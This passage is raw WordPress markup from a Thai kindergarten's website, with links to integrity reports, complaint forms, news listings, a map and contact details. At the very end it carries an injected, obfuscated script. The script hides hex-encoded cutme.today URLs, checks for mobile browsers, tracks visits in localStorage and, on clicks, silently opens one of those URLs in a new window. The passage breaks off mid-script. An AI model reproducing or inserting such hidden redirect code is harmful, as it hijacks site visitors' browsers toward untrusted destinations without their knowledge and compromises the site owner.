href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else 